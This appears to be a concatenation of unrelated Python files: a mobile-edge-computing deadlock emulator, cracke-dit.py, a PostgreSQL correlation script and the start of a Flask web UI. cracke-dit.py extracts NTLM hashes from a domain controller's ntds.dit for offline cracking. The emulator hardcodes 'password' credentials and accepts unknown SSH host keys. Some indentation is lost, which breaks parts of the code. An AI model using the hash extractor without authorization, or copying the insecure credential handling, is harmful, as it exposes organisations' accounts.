    `pc` is presumably a ping helper module imported elsewhere — TODO confirm.
    """
    rtt = pc.verbose_ping(host)
    return round(rtt, 4)
def gcd(a, b):
    """Greatest common divisor via the iterative Euclidean algorithm."""
    while b != 0:
        a, b = b, a % b
    return a
def _lcm(a, b):
    """Least common multiple of two positive ints.

    Uses floor division instead of the original `int(a * b / gcd(a, b))`:
    float division loses precision once a*b exceeds 2**53, which silently
    corrupts the hyperperiod for large task periods.
    """
    return a * b // gcd(a, b)
def lcm(_list):
    """LCM of a whole list, folded pairwise with _lcm.

    `reduce` is imported elsewhere in the file (presumably from functools —
    TODO confirm).
    """
    return reduce(_lcm, _list)
def gosh_dist(_range):
    """Return a pseudo-random int in [0, _range) from a hand-rolled generator.

    `r` is presumably the random module under an alias imported elsewhere —
    TODO confirm.
    """
    return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def on_connect(connect_client, userdata, flags, rc):
    """MQTT on_connect callback: subscribe to this node's own topic and the
    shared 'mec' topic."""
    connect_client.subscribe(node_id)
    connect_client.subscribe('mec')
# Callback Function on Receiving the Subscribed Topic/Message
def on_message(message_client, userdata, msg):
    """MQTT on_message callback.

    Payload convention (first character is a tag):
      'c' — result coming back from the cloud; republish it on the owning
            client's topic together with the completion time.
      't' — task set arriving from a client; queue it for the scheduler.
    """
    data = str(msg.payload, 'utf-8')
    if data[0] == 'c':  # receive from cloud
        data = data[2:]
        received_task = ast.literal_eval(data)
        # send_client({received_task: get_time()}, cloud_register[received_task.split('.')[2]])
        _client.publish(received_task.split('.')[2], str({received_task: get_time()}))
    elif data[0] == 't':  # receive from client
        received_task = ast.literal_eval(data[2:])
        received_task_queue.append(received_task)
    '''
    else:
        print('data: ', data)
    elif data[0] == 't':
        print('send: ', data[2:])
    '''
def connect_to_broker():
    """Connect to the local MQTT broker and block in its network loop.

    Sets the module-level `_client`, `broker_ip` and `topic`. loop_forever()
    never returns, so this must run in its own thread.
    """
    global _client
    global broker_ip
    global topic
    username = 'mec'
    password = 'password'
    broker_ip = 'localhost'
    broker_port_no = 1883
    topic = 'mec'  # topic used to exchange mec details to clients
    _client = mqtt.Client()
    _client.on_connect = on_connect
    _client.on_message = on_message
    _client.username_pw_set(username, password)
    _client.connect(broker_ip, broker_port_no, 60)
    _client.loop_forever()
def edf():
    """Earliest Deadline First scheduler over the global `tasks` table.

    Expands each task over the hyperperiod (LCM of all periods), orders the
    resulting jobs by absolute deadline, and simulates execution; jobs that
    would miss their deadline are handed to cooperative_mec() for offloading.

    Returns the list of task ids in execution order.
    """
    t_lcm = lcm([tasks[i]['period'] for i in tasks])
    t_dead = {i: tasks[i]['deadline'] for i in tasks}
    # Sort by (deadline, task id) for a deterministic expansion order.
    sorted_dead = sorted(t_dead.items(), key=lambda kv: (kv[1], kv[0]))
    ready_task = []
    for i in sorted_dead:
        period = tasks[i[0]]['period']
        t_range = int(t_lcm/period)
        last_dead = 0
        # One job per period instance within the hyperperiod.
        for j in range(t_range):
            ready_task.append((i[0], last_dead+tasks[i[0]]['deadline']))
            last_dead += period
    ready_task = sorted(ready_task, key=lambda t: t[1])
    print(ready_task)
    t_time_ = 0
    schedule = []
    missed = []
    register = {i: 0 for i in tasks.keys()}  # {task_id: jobs already executed}
    for i in ready_task:
        # Idle forward in time while this task's execution quota for the
        # current period is already met.
        if (t_time_//tasks[i[0]]['period'])+1 <= register[i[0]]:
            while (t_time_//tasks[i[0]]['period'])+1 <= register[i[0]]:
                t_time_ += 1
        if (t_time_//tasks[i[0]]['period'])+1 > register[i[0]]:
            if t_time_ + tasks[i[0]]['wcet'] <= i[1]:
                register[i[0]] += 1
                t_time_ += tasks[i[0]]['wcet']
                schedule.append(i[0])
            else:
                print('Deadline missed: ', i)
                missed.append(i[0])
    if len(missed) > 0:
        # Unschedulable locally: offload the missed jobs.
        cooperative_mec(missed)
    return schedule
# generate execution sequence using banker's algorithm
def is_safe(processes, avail, _need_, allot, p):  # bankers algorithm
    """Banker's safety algorithm with forced offloading on deadlock.

    Args:
        processes: task ids ('<task>_<idx>' strings).
        avail: available instances of each of the 3 resource types.
        _need_: {process: [need per resource]} in the same order as processes.
        allot: {process: [allocated per resource]} in the same order.
        p: number of processes (== len(processes)).

    Returns the safe execution sequence. When the state is unsafe, the most
    heavily allocated blocked task is repeatedly offloaded (cooperative_mec)
    until the remainder is safe.

    Bug fix: the original tested "all needs satisfied" with the leaked loop
    index of a `break`ed for-loop (`if j == res - 1`), which wrongly accepted
    a process whose need exceeded `work` in the LAST resource only. The check
    is now an explicit all() over every resource.
    """
    need = [_need_[i] for i in _need_]
    _allot_ = [allot[i] for i in allot]
    offload = []  # tasks forced off this MEC to break the deadlock
    res = 3  # number of resource types
    finish = [0] * p
    safe_seq = [0] * p
    work = avail[:res]  # working copy of the available resources
    count = 0
    while count < p:
        # Find an unfinished process whose remaining need fits in work[].
        found = False
        for t in range(p):
            if finish[t] == 0:
                if all(need[t][j] <= work[j] for j in range(res)):
                    # Pretend it runs to completion and frees its allocation.
                    for k in range(res):
                        work[k] += _allot_[t][k]
                    safe_seq[count] = processes[t]
                    count += 1
                    finish[t] = 1
                    found = True
        if not found:
            # Unsafe state: offload the blocked task holding the most
            # resources, reclaim its allocation, and retry.
            print("System is not in safe state")
            a = list(set(processes) - set(safe_seq) - set(offload))
            n = {}
            for i in a:
                # NOTE(review): `allocation` / `_need` are module-level tables
                # keyed by the 2-char task-type prefix — defined elsewhere.
                n[i] = sum(allocation[i[:2]])
            _max = max(n, key=n.get)
            print('work: ', work, 'need: ', _need[_max[:2]])
            offload.append(_max)
            work = np.array(work) + np.array(allocation[_max[:2]])
            count += 1
            finish[processes.index(_max)] = 1
            found = True
    if len(offload) > 0:
        # Truncate the sequence at the first unfilled slot and hand the
        # offloaded tasks to the cooperative platform.
        safe_seq = safe_seq[:safe_seq.index(0)]
        print('offloading tasks: ', offload)
        cooperative_mec(offload)
        deadlock[0] += 1
    print("System is in safe state.",
          "\nSafe sequence is: ", end=" ")
    print('safe seq: ', safe_seq)
    return safe_seq
def get_exec_seq(pro):
    """Build per-process need/allocation tables and run the banker's safety
    check, returning the safe execution sequence.

    `_need` and `allocation` are module-level tables keyed by the 2-char task
    type prefix — defined elsewhere in the file (TODO confirm).
    """
    # Number of processes
    p = len(pro)
    # Suffix each task with its position so duplicate ids stay distinct.
    processes = ['{}_{}'.format(pro[i], i) for i in range(len(pro))]
    # Available instances of resources
    avail = [6, 5, 5]
    n_need = {i: _need[i[:2]] for i in processes}
    # Resources allocated to processes
    allot = {i: allocation[i[:2]] for i in processes}
    # return execution sequence
    return is_safe(processes, avail, n_need, allot, p)
def calc_wait_time(list_seq):
    """Compute each task's cumulative waiting time for the safe sequence and
    broadcast half of the total as this host's advertised wait time.

    Returns {task: wait_time} in sequence order.
    """
    pre = 0
    time_dic = {}
    for i in list_seq:
        j = i.split('_')[0]
        time_dic[i] = round(t_time[j][0] + pre, 3)
        pre += t_time[j][0]
    # waiting time = total waiting time / 2 — the plain average might be too tight
    w_send = round(time_dic[list(time_dic.keys())[-1]]/2, 3)
    send_message('wt {} {}'.format(ip_address(), str(w_send)))  # multi-casting waiting time to cooperative MECs
    return time_dic
def compare_local_mec(list_seq):
    """Split scheduled tasks into those worth offloading vs running locally.

    A task runs locally when its latency budget (t_time[task][1]) exceeds its
    computed local waiting time. Returns (execute_mec, execute_locally).
    """
    time_compare_dict = {i: t_time[i.split('_')[0]][1] > list_seq[i] for i in list_seq}
    print('local vs MEC comparison: ', time_compare_dict)
    execute_locally = [task for task, stay_local in time_compare_dict.items() if stay_local]
    execute_mec = [task for task, stay_local in time_compare_dict.items() if not stay_local]
    return execute_mec, execute_locally
def calculate_mov_avg(ma1, a1):
    """Fold sample `a1` into the cumulative moving average for peer `ma1`.

    Cumulative average formula: mu_n = ((n-1) * mu_(n-1) + x_n) / n, where the
    previous average is the last entry in mec_waiting_time[ma1] (0 when the
    peer has no history yet). Result rounded to 4 decimals.
    """
    if ma1 in mec_waiting_time:
        history = mec_waiting_time[ma1]
        n = len(history) + 1
        previous = history[-1]
    else:
        n = 1
        previous = 0
    return round(((n - 1) * previous + a1) / n, 4)
def algo_id():
    """Map the leading digit of this script's filename to an algorithm id
    (used so clients can tell which scheduling variant is running)."""
    no = int(os.path.basename(__file__)[0])
    for upper_bound, ident in ((2, 2), (4, 3), (7, 7), (10, 10), (13, 12)):
        if no <= upper_bound:
            return ident
    return 16
def send_message(mg):
    """Multicast a control message to the cooperative-MEC discovery group.

    Message kinds:
      'hello'  — announce this node (as 'speaker') with its ip.
      'update' — broadcast the full host table including this host.
      'client' — publish host table + algorithm id to clients over MQTT.
      anything else is sent verbatim (e.g. 'wt <ip> <wait>').
    """
    _multicast_group = ('224.3.29.71', 10000)
    try:
        # Send data to the multicast group
        if mg == 'hello':
            smg = mg + ' ' + str(['speaker', ip_address()])
            sock1.sendto(str.encode(smg), _multicast_group)
            print('\nHello message sent')
        elif mg == 'update':
            ho = hosts.copy()
            ho[get_hostname()] = host_ip
            smg = mg + ' ' + str(ho)
            sock1.sendto(str.encode(smg), _multicast_group)
        elif mg == 'client':
            ho = hosts.copy()
            ho[get_hostname()] = host_ip
            smg = f'm {ho}_{algo_id()}'
            _client.publish(topic, smg, retain=True)
        else:
            sock1.sendto(str.encode(mg), _multicast_group)
    except Exception as e:
        print(e)
def get_hostname():
    """Read this machine's hostname from /etc/hostname, stripping the
    trailing newline."""
    raw = sp.check_output(['cat /etc/hostname'], shell=True)
    return str(raw, 'utf-8')[0:-1]
def receive_message():
    """Background loop: process discovery-group datagrams until `stop` is set.

    Handles:
      'hello <[name, ip]>'  — register a newly announced MEC host.
      'update <hosts dict>' — replace the host table (only while discovering).
      'wt <ip> <seconds>'   — fold a peer's advertised waiting time into a
                              moving average of (wait + RTT).
      'user'                — a client asked for the host table; rebroadcast.
    """
    global hosts
    while True:
        if stop == 1:
            print('Stopped : receive_message()')
            break
        else:
            data, address = sock1.recvfrom(1024)
            _d = data.decode()
            if _d[:5] == 'hello':
                _data = ast.literal_eval(_d[6:])
                hosts[_data[0]] = _data[1]
                # Start an RTT series for every peer that is not ourselves.
                if _data[1] != host_ip:
                    mec_rtt[_data[1]] = []
            elif (_d[:6] == 'update') and (discovering == 0):
                hosts = ast.literal_eval(_d[7:])
            elif _d[:2] == 'wt':
                split_data = _d.split()
                if split_data[1] != host_ip:
                    w_time = calculate_mov_avg(split_data[1], float(split_data[2]) + get_rtt(
                        address[0]))  # calculate moving average of mec wait time => w_time = wait time + rtt
                    if split_data[1] in mec_waiting_time:
                        mec_waiting_time[split_data[1]].append(w_time)
                    else:
                        mec_waiting_time[split_data[1]] = [w_time]
            elif data.decode().strip() == 'user':
                send_message('update')
def mec_comparison():
    """Return the peer MEC ip with the smallest last-seen waiting time,
    or 0 when no peer wait-time information has been collected yet."""
    if not mec_waiting_time:
        return 0
    latest = {ip: samples[-1] for ip, samples in mec_waiting_time.items()}
    return min(latest, key=latest.get)
def cooperative_mec(mec_list):
    """Offload each task either to the least-loaded peer MEC or to the cloud.

    A task goes to the best peer only if that peer's advertised wait time is
    below the task's latency budget AND its resource need fits the capacity
    vector; otherwise it is published to the cloud broker topic.
    """
    global _off_cloud
    global _off_mec
    for i in mec_list:
        _host = mec_comparison()
        if _host == 0:
            # No peer wait-time info yet: go straight to the cloud.
            _client.publish(cloud_ip, str([i.split('_')[0], t_time[i.split('_')[0]][0]]))
            _off_cloud += 1
            print('\n=========SENDING {} TO CLOUD==========='.format(i))
        else:
            j = i.split('_')[0]
            _max = np.array([6, 5, 5])  # per-MEC resource capacity
            send = 'false'
            if not (False in list(np.greater_equal(_max, _need[j[:2]]))):
                send = 'true'
            # CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN LATENCY
            if mec_waiting_time[_host][-1] < t_time[j][1] and send == 'true':
                send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [j, t_time[j][0]]))
                _off_mec += 1
                # SENDS TASK TO MEC FOR EXECUTION
                mec_waiting_time[_host].append(
                    round(mec_waiting_time[_host][-1] + (t_time[j][0]) / 2, 3))  # adds a new average waiting time
                print('\n======SENDING {} TO MEC {}========='.format(i, _host))
            else:
                _client.publish(cloud_ip, str([j, t_time[j][0]]))
                _off_cloud += 1
                print('\n=========SENDING {} TO CLOUD==========='.format(i))
def execute_re_offloaded_task(offloaded_task):
    """Run tasks re-offloaded here by peers, then notify the source MEC.

    offloaded_task is [task_list, {task: exec_time}]; execution is simulated
    by sleeping half of each task's execution time.
    """
    exec_list = get_exec_seq(offloaded_task[0])
    for i in exec_list:
        j = i.split('_')[0]
        time.sleep(offloaded_task[1][j]/2)
        # '<owner_mec_id> <task-without-*tag>' back on the offloading group.
        send_offloaded_task_mec('{} {}'.format(j.split('.')[1], i.split('*')[0]))
def execute(local):
    """Simulate local execution of scheduled tasks and report completion.

    Sleeping half the execution time stands in for real work. Results for
    tasks owned by another MEC are multicast back to it; results for this
    node's own clients are published on the client's MQTT topic.
    """
    print('\nExecuting :', local)
    for i in local:
        j = i.split('_')[0]
        time.sleep(t_time[j][0]/2)
        print('#' * ((local.index(i) + 1) * 3), ' Executed: ', i)
        if j.split('.')[1] != node_id:
            send_offloaded_task_mec('{} {}'.format(j.split('.')[1], j))
        elif j.split('.')[1] == node_id:
            _client.publish(j.split('.')[2], str({j: get_time()}))
    print('============== EXECUTION DONE ===============')
def receive_offloaded_task_mec():  # run as a thread
    """Background loop: handle datagrams on the offloading multicast group.

    '<our node_id> <task>'     — a peer finished one of our tasks; forward
                                 the result to the originating client.
    'ex <our node_id> [task,t]' — a peer asks us to execute a task; tag it
                                 with a unique '*<t_track>' suffix and queue
                                 it on reoffload_list under the lock.
    """
    global _inward_mec
    global t_track
    while True:
        if stop == 1:
            print('Stopped: receive_offloaded_task_mec()')
            break
        else:
            data, address = sock2.recvfrom(1024)
            if len(data.decode()) > 0:
                da = data.decode().split(' ')
                if (address[0] not in ip_set) and da[0] == node_id:  # send back to client
                    _client.publish(da[1].split('.')[2], str({da[1]: get_time()}))
                elif (address[0] not in ip_set) and da[0] == 'ex' and da[1] == node_id:
                    _received = ast.literal_eval(da[2] + da[3])
                    shared_resource_lock.acquire()
                    task = _received[0] + '*{}'.format(t_track)
                    reoffload_list[0].append(task)
                    reoffload_list[1][task] = _received[1]
                    shared_resource_lock.release()
                    t_track += 1
                    _inward_mec += 1
def call_execute_re_offload():
    """Background loop: drain reoffload_list and execute queued peer tasks.

    A single queued task is simulated inline; multiple tasks go through the
    scheduler via execute_re_offloaded_task(). Mutations of the shared list
    and dict are guarded by shared_resource_lock.
    """
    global reoffload_list
    while True:
        if stop == 1:
            print('Stopped: call_execute_re_offload()')
            break
        else:
            if len(reoffload_list[0]) == 1:
                t = reoffload_list[0][-1]
                time.sleep(reoffload_list[1][t]/2)
                shared_resource_lock.acquire()
                reoffload_list[0].remove(t)
                del reoffload_list[1][t]
                shared_resource_lock.release()
                send_offloaded_task_mec('{} {}'.format(t.split('.')[1], t.split('*')[0]))
            elif len(reoffload_list[0]) > 1:
                # NOTE(review): .copy() is shallow — `o` shares the inner
                # list/dict with reoffload_list; confirm this is intended.
                o = reoffload_list.copy()
                execute_re_offloaded_task(o)
                for i in o[0]:
                    shared_resource_lock.acquire()
                    reoffload_list[0].remove(i)
                    del reoffload_list[1][i]
                    shared_resource_lock.release()
            time.sleep(1)
def send_email(msg):
    """Email the experiment results via Gmail SMTP.

    Credentials and addresses come from the external `config` module;
    failures are printed and swallowed (best-effort reporting).
    """
    try:
        server = smtplib.SMTP_SSL('smtp.gmail.com')
        server.ehlo()
        server.login(config.email_address, config.password)
        subject = 'Deadlock results edf+bankers {}'.format(get_hostname())
        _message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
        server.sendmail(config.email_address, config.send_email, _message)
        server.quit()
        print("Email sent!")
    except Exception as e:
        print(e)
def send_offloaded_task_mec(msg):
    """Multicast `msg` on the offloading group (224.5.5.55:20000)."""
    _multicast_group = ('224.5.5.55', 20000)
    try:
        sock2.sendto(str.encode(msg), _multicast_group)
    except Exception as e:
        print(e)
def mec_id(client_ip):
    """Return the final octet of `client_ip` zero-padded to three characters
    (e.g. '192.168.0.5' -> '005'), used as this node's identifier."""
    return client_ip.split('.')[-1].zfill(3)
def run_me():
    """Top-level driver: discover peers, then start the scheduling loop.

    Blocks until `mec_no` hosts are known, freezes discovery, starts the
    host-table broadcaster thread, then enters start_loop().
    """
    global discovering
    initialization()
    while True:
        if len(hosts) == mec_no:
            print('MEC Details: ', hosts)
            del hosts['speaker']
            discovering = 1
            break
        time.sleep(2)
    speak = Thread(target=speaking_node)
    thread_record.append(speak)
    speak.daemon = True
    speak.start()
    start_loop()
def send_result(host_, data):
    """Append each result line to /home/mec/result/data.py on `host_` via
    SSH (paramiko, fixed mec/password credentials); errors are printed."""
    try:
        c = paramiko.SSHClient()
        un = 'mec'
        pw = 'password'
        port = 22
        c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        c.connect(host_, port, un, pw)
        for i in data:
            cmd = ('echo "{}" >> /home/mec/result/data.py'.format(i))  # task share : host ip task
            stdin, stdout, stderr = c.exec_command(cmd)
    except Exception as e:
        print(e)
def save_and_abort():
    """Persist all collected metrics, email them, and terminate the process.

    Results are appended to a local data.py, copied to the master host
    ('osboxes-0') over SSH, and emailed; worker loops are signalled via
    `stop`, then the process is killed outright.
    """
    global stop
    _id_ = get_hostname()[-1]
    result = f"wt{_id_}_3_{mec_no} = {mec_waiting_time} " \
             f"\nrtt{_id_}_3_{mec_no} = {mec_rtt} \ncpu{_id_}_3_{mec_no} = {_cpu} " \
             f"\noff_mec{_id_}_3_{mec_no} = {_off_mec} " \
             f"\noff_cloud{_id_}_3_{mec_no} = {_off_cloud} " \
             f"\ninward_mec{_id_}_3_{mec_no} = {_inward_mec}" \
             f"\nloc{_id_}_3_{mec_no} = {_loc} " \
             f"\ndeadlock{_id_}_3_{mec_no} = {deadlock} \nmemory{_id_}_3_{mec_no} = {memory}"
    list_result = [
        f"wt{_id_}_3_{mec_no} = {mec_waiting_time} ",
        f"\nrtt{_id_}_3_{mec_no} = {mec_rtt} \ncpu{_id_}_3_{mec_no} = {_cpu} ",
        f"\noff_mec{_id_}_3_{mec_no} = {_off_mec} \noff_cloud{_id_}_3_{mec_no} = {_off_cloud} ",
        f"\ninward_mec{_id_}_3_{mec_no} = {_inward_mec}",
        f"\nloc{_id_}_3_{mec_no} = {_loc} ",
        f"\ndeadlock{_id_}_3_{mec_no} = {deadlock} \nmemory{_id_}_3_{mec_no} = {memory}"
    ]
    for i in list_result:
        cmd = 'echo "{}" >> data.py'.format(i)
        os.system(cmd)
    send_result(hosts['osboxes-0'], list_result)
    send_email(result)
    stop += 1
    '''
    for i in thread_record:
        i.join()
    '''
    _client.loop_stop()
    time.sleep(1)
    print('done')
    os.system('kill -9 {}'.format(os.getpid()))
def start_loop():
    """Main scheduling loop: consume client task sets until timeout/interrupt.

    For each received (tasks, t_time) pair: run EDF + banker's algorithm,
    split the safe sequence into local vs offloaded work, execute, and sample
    metrics. Aborts (saving results) after 3 idle minutes or on Ctrl-C.
    """
    global _loc
    global tasks
    global t_time
    global node_id
    global stop
    print('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n')
    node_id = mec_id(ip_address())
    _threads_ = [receive_offloaded_task_mec, call_execute_re_offload, connect_to_broker]
    for i in _threads_:
        # NOTE(review): daemon is set on a throwaway Thread object; the
        # started thread below is a *different*, non-daemon instance.
        Thread(target=i).daemon = True
        Thread(target=i).start()
    time.sleep(2)
    send_message('client')  # send mec details to clients
    x = gp.getpass('Press any key to Start...').lower()
    if x != 'exit':
        print('========= Waiting for tasks ==========')
        _time_ = dt.datetime.now()
        while True:
            try:
                if len(received_task_queue) > 0:
                    info = received_task_queue.pop(0)
                    tasks, t_time = info
                    print('EDF List of Processes: ', tasks, '\n')
                    print('\n========= Running Deadlock Algorithm ===========')
                    list_seq = get_exec_seq(edf())
                    if len(list_seq) > 0:  # do only when there is a task in safe sequence
                        wait_list = calc_wait_time(list_seq)
                        print('\nWaiting Time List: ', wait_list)
                        compare_result = compare_local_mec(wait_list)
                        print('\nExecute Locally: ', compare_result[1])
                        _loc += len(compare_result[1])  # total number of tasks to be executed locally
                        print('\nExecute in MEC: ', compare_result[0])
                        print('\nSending to cooperative platform')
                        if len(compare_result[0]) > 0:
                            cooperative_mec(compare_result[0])
                        execute(compare_result[1])
                        generate_results()
                        _time_ = dt.datetime.now()  # reset the idle timer
                else:
                    # Idle: advertise zero waiting time to peers.
                    send_message(str('wt {} 0.0'.format(ip_address())))
                    time.sleep(.5)
                now = dt.datetime.now()
                delta = now - _time_
                if delta > dt.timedelta(minutes=3):
                    print('terminating programme 3 mins elapsed')
                    save_and_abort()
                    break
            except KeyboardInterrupt:
                print('\nProgramme Terminated')
                save_and_abort()
                break
def speaking_node():
    """Background loop: rebroadcast the host table whenever a new MEC joins,
    growing `mec_no` to match."""
    global mec_no
    while True:
        if len(hosts) > (mec_no - 1):
            send_message('update')
            mec_no = len(hosts) + 1
        time.sleep(2)
def initialization():
    """Interactive setup: read the MEC count and cloud ip, start the
    listener threads, and multicast the initial 'hello' announcement."""
    global mec_no
    global host_ip
    global cloud_ip
    host_ip = ip_address()
    # UDP connect() only selects a route — used to display the broker ip.
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.connect(("8.8.8.8", 80))
    print('Broker IP: ', s.getsockname()[0])
    try:
        mec_no = int(input('Number of MECs: ').strip())
        cloud_ip = input('Cloud Server IP: ').strip()
        print('\nCompiling MEC Details')
        h1 = Thread(target=receive_message)
        h2 = Thread(target=receive_offloaded_task_mec)
        h1.daemon = True
        h2.daemon = True
        h1.start()
        h2.start()
        time.sleep(1.5)
        while True:
            b = input('Send Hello Message (Y/N): ').strip().lower()
            if b == 'y':
                send_message('hello')
                break
            else:
                print('\nPlease Type "y" to send Hello message\n')
    except KeyboardInterrupt:
        print('\nProgramme Terminated')
        exit(0)
def main():
    """Entry point: join both multicast groups, record local interface ips,
    and hand over to run_me()."""
    global algo
    os.system('clear')
    print('mec ip: ', ip_address())
    algo = psutil.Process()  # handle used for memory sampling in _memory()
    discovering_group()
    offloading_group()
    host_ip_set()
    run_me()
if __name__ == "__main__":
main()
|
cracke-dit.py | import sys, glob, os, argparse, itertools, time
from threading import Thread, Event
import ntds_parser as ntds, outputs
from database import HashDatabase, DomainDoesntExist
BANNER = """\033[91m
__ ___ __
______________ ______/ /_____ ____/ (_) /_
/ ___/ ___/ __ `/ ___/ //_/ _ \______/ __ / / __/
/ /__/ / / /_/ / /__/ ,< / __/_____/ /_/ / / /_
\___/_/ \__,_/\___/_/|_|\___/ \033[90mv1.1\033[0m\033[91m \__,_/_/\__/
\033[0m@darkp0rt\n"""
if __name__ == "__main__":
print(BANNER)
available_outputs = ", ".join(outputs.discover_outputs().keys())
parser = argparse.ArgumentParser(add_help=False, description="crack-dit makes it easier to perform password "
"audits against Windows-based corporate environments.",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("--database-name", default="db.json", action="store", help="Name of the database file to store")
parser.add_argument("--help", action="store_true", help="show this help message and exit", required=False)
group = parser.add_argument_group("1. Cracking", "cracke-dit can take your raw ntds.dit and SYSTEM hive "
"and turn them in to a user:hash file for cracking "
"within your favourite password cracker")
group.add_argument("--system", action="store", help="(local) SYSTEM hive to parse")
group.add_argument("--ntds", action="store", help="(local) ntds.dit file to parse")
group.add_argument("--username", action="store", help="(remote) Domain Admin username to connect to the target")
group.add_argument("--password", action="store", help="(remote) Domain Admin username to connect to the target")
group.add_argument("--target", action="store", help="(remote) IP address of the Domain Contoller to connect to")
group.add_argument("--out", action="store", help="File to write user:hash to")
group.add_argument("--no-history", action="store_false", dest="historic", default=True,
help="Set to disable historic password processing. Will speed up significantly.")
group = parser.add_argument_group("2. Reporting", "use these options to process a hash:password file from "
"your favourite password cracker")
group.add_argument("--pot", action="store", help="Your .pot file in hash:password format.")
group.add_argument("--domain", action="store", help="Full domain FQDN, i.e. acme.local.")
group.add_argument("--only-enabled", action="store_true", dest="only_enabled", default=False,
help="Only show passwords for enabled accounts.")
group.add_argument("--only-users", action="store_true", dest="only_users", default=False,
help="Only show user accounts, i.e. ignore computer accounts.")
group.add_argument("--output", action="store", default="stdout",
help="Output module to visualise the data: %s " % available_outputs)
args, unknown_args = parser.parse_known_args()
args = outputs.get_output_by_name(args.output).add_args(parser)
local = (args.system and args.ntds)
remote = (args.username and args.password and args.target)
if local or remote:
domain, records = ntds.process_local(args.system, args.ntds, args.historic) if local else ntds.process_remote(args.username, args.password, args.target, args.historic)
ntlm_file = args.out or "{0}.hashes.ntlm".format(domain)
with HashDatabase(args.database_name, domain, raise_if_table_doesnt_exist=False) as db:
with open(ntlm_file, "w+") as out:
for record in records:
out.write("%s:%s%s" % (record["username"], record["ntlmhash"], os.linesep))
db.insert(record)
print("Found {} hashes for '{}', available at {}. Run them through your favourite password cracker and re-run cracke-dit with --pot - see README for tips!".format(len(records), domain, ntlm_file))
elif args.pot and args.domain:
        def __update(stopper):
            """Spinner thread: animate a progress indicator on stdout until
            `stopper` (a threading.Event) is set."""
            spinner = itertools.cycle(['-', '/', '|', '\\'])
            while not stopper.is_set():
                sys.stdout.write("[" + next(spinner) + "] Processing... \r")
                sys.stdout.flush()
                time.sleep(0.2)
        def __opendb(domain):
            """Open the hash database for `domain`, fold in cracked passwords
            from the .pot file (hash:password lines), and run the selected
            output module."""
            with HashDatabase(args.database_name, domain, raise_if_table_doesnt_exist=True, only_enabled=args.only_enabled, only_users=args.only_users) as db:
                try:
                    with open(args.pot, "r") as pot:
                        for line in pot:
                            line = line.rstrip("\r\n").replace("$NT$", "")  # $NT$ for John
                            hash, password = map(str.strip, line.split(":"))
                            if password:
                                db.update_hash_password(hash, password)
                    outputs.get_output_by_name(args.output).run(db, args)
                except IOError:
                    print("Failed to read '{}'. Make sure the file exists and is readable.".format(args.pot))
                    print("Did you mean: {}?".format(", ".join(glob.glob("*.pot"))))
stopper = Event()
spinner = Thread(target=__update, args=(stopper,))
spinner.start()
try:
__opendb(args.domain)
except DomainDoesntExist as e:
print(e.message)
print("Did you mean: {}?".format(", ".join(e.tables[1:])))
finally:
stopper.set()
spinner.join()
else:
parser.print_help()
|
plot-time-difference.py | """
file: plot-time-difference.py
brief: Initial attempt at doing event correlation on a table.
author: S. V. Paulauskas
date: February 22, 2019
"""
import keyring
import psycopg2
import pandas as pd
import threading
import time
import yaml
import sys
def chunk_data_frame(frame, n):
    """Split `frame` into ~n consecutive chunks.

    Bug fix: when n > len(frame) the original computed a chunk size of 0 and
    the cursor never advanced, looping forever while appending empty slices.
    The chunk size is now at least 1, which preserves the original behaviour
    for n <= len(frame).

    Args:
        frame: a pandas DataFrame (anything supporting len() and .iloc).
        n: desired number of chunks.

    Returns:
        list of positional slices covering `frame` in order.
    """
    df_len = len(frame)
    chunk_size = max(1, int(df_len / n))
    dfs = []
    count = 0
    while count <= df_len - 1:
        start = count
        count += chunk_size
        dfs.append(frame.iloc[start: count])
    return dfs
def run(conn, frame):
    """Worker: build and execute the gated-insert statements for one chunk
    of trigger times.

    Bug fix: the original ignored its `conn` parameter and used the global
    `connection`, so every worker thread silently shared the main thread's
    connection object. It also used the deprecated threading.currentThread.

    Args:
        conn: an open psycopg2 connection for this worker.
        frame: DataFrame chunk whose first column holds trigger times.
    """
    cursor = conn.cursor()
    start = time.time()
    print(threading.current_thread().name, '- Generating statement list.')
    statement = ''
    for row in frame.itertuples():
        # Correlation window: [t - 126, t - 63] relative to each trigger.
        statement += cursor.mogrify(
            "insert into gated select id, energy, time from data where time between %s and %s and id>3;",
            (str(row[1] - 126), str(row[1] - 63))).decode()
    print(threading.current_thread().name, 'Finished generating statement list in ', time.time() - start, 'seconds.')
    start = time.time()
    print(threading.current_thread().name, '- Executing many.')
    cursor.execute(statement)
    print(threading.current_thread().name, '- Finished executing many in ', time.time() - start, 'seconds.')
if __name__ == '__main__':
    # Connection settings (host/port/username/db/numThreads) come from the
    # YAML file named on the command line; the password comes from keyring.
    with open(sys.argv[1]) as f:
        cfg = yaml.safe_load(f)
    try:
        connection = psycopg2.connect(user=cfg['username'], password=keyring.get_password(cfg['host'], cfg['username']),
                                      host=cfg['host'], port=cfg['port'], database=cfg['db'])
        cursor = connection.cursor()
        # Trigger times from channel id00 drive the correlation windows.
        cursor.execute('select time from id00;')
        triggers = pd.DataFrame.from_dict(cursor.fetchall())
        threads = []
        num_threads = cfg['numThreads']
        framechunks = chunk_data_frame(triggers, num_threads)
        start = time.time()
        # One worker thread per chunk of trigger times.
        for i in range(0, num_threads):
            t = threading.Thread(target=run, args=(connection, framechunks[i]))
            threads.append(t)
            t.start()
        for thread in threads:
            thread.join()
        print('Main Thread - Executed in ', (time.time() - start)/60, " minutes.")
    except psycopg2.Error as ex:
        print("Error connecting to db.", ex)
|
webui.py | from multiprocessing import Queue, Manager, Process
from time import sleep
from flask import Flask, render_template, request, redirect, url_for, flash
from time import sleep
from wtforms import Form, SelectField, SelectMultipleField, BooleanField, widgets, FieldList
from os import system
import common, colors
import json
import yaml
class MultiCheckboxField(SelectMultipleField):
    """
    A multiple-select, except displays a list of checkboxes.

    Iterating the field will produce subfields, allowing custom rendering of
    the enclosed checkbox fields.
    """
    widget = widgets.ListWidget(prefix_label=True)  # render options as a labelled list
    option_widget = widgets.CheckboxInput()  # each option rendered as a checkbox
class SettingsForm(Form):
    """WTForms form mirroring the game settings held in ns.settings."""
    move_can_be_admin = BooleanField('Allow Move to change settings')
    play_instructions = BooleanField('Play instructions before game start')
